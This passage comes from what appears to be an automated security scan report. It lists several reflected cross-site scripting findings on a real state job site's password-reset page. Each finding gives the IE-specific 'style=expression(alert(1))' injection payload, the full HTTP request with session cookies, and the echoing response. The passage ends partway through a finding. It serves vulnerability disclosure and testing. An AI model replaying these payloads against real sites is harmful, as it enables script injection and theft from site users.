Date: Fri, 29 Apr 2011 21:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;formid=1050bdc"><a>d414acd7200&amp;rand=887277&amp;choice=1">
...[SNIP]...

3.127. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 was submitted in the FormName parameter. This input was echoed as ed897"style="x:expression(alert(1))"6af9926f561ad08f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which allows easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMNAME_prev" value="Form0ed897"style="x:expression(alert(1))"6af9926f561ad08f3" />
...[SNIP]...

3.128. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbf0"style%3d"x%3aexpression(alert(1))"34e6cd92313 was submitted in the FormName parameter. This input was echoed as 2bbf0"style="x:expression(alert(1))"34e6cd92313 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form02bbf0"style%3d"x%3aexpression(alert(1))"34e6cd92313

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="formname_error" value="Form02bbf0"style="x:expression(alert(1))"34e6cd92313" class="cfTransparent" />
...[SNIP]...

3.129. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [OLD_CHOICE_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the OLD_CHOICE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca44"style%3d"x%3aexpression(alert(1))"42ce90c0891 was submitted in the OLD_CHOICE_prev parameter. This input was echoed as dca44"style="x:expression(alert(1))"42ce90c0891 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
53Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2dca44"style%3d"x%3aexpression(alert(1))"42ce90c0891&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:05'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="old_choice" value="2dca44"style="x:expression(alert(1))"42ce90c0891" class="cfTransparent" />
...[SNIP]...

3.130. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [RAND_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the RAND_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8a7"style%3d"x%3aexpression(alert(1))"c44cab2e4c1 was submitted in the RAND_prev parameter. This input was echoed as 1c8a7"style="x:expression(alert(1))"c44cab2e4c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=19021c8a7"style%3d"x%3aexpression(alert(1))"c44cab2e4c1&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:59'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="rand" value="19021c8a7"style="x:expression(alert(1))"c44cab2e4c1" class="cfTransparent" />
...[SNIP]...

3.131. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SECURITYSYS_prev parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the SECURITYSYS_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de510"style%3d"x%3aexpression(alert(1))"dcaa05356ba was submitted in the SECURITYSYS_prev parameter. This input was echoed as de510"style="x:expression(alert(1))"dcaa05356ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=onde510"style%3d"x%3aexpression(alert(1))"dcaa05356ba&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:10 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:10'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="securitysys" value="onde510"style="x:expression(alert(1))"dcaa05356ba" class="cfTransparent" />
...[SNIP]...

3.132. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [U_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the U_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaf8"style%3d"x%3aexpression(alert(1))"801d98fbf25 was submitted in the U_name parameter. This input was echoed as daaf8"style="x:expression(alert(1))"801d98fbf25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yesdaaf8"style%3d"x%3aexpression(alert(1))"801d98fbf25&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:35'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="u_name_error" value="yesdaaf8"style="x:expression(alert(1))"801d98fbf25" class="cfTransparent" />
...[SNIP]...

3.133. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

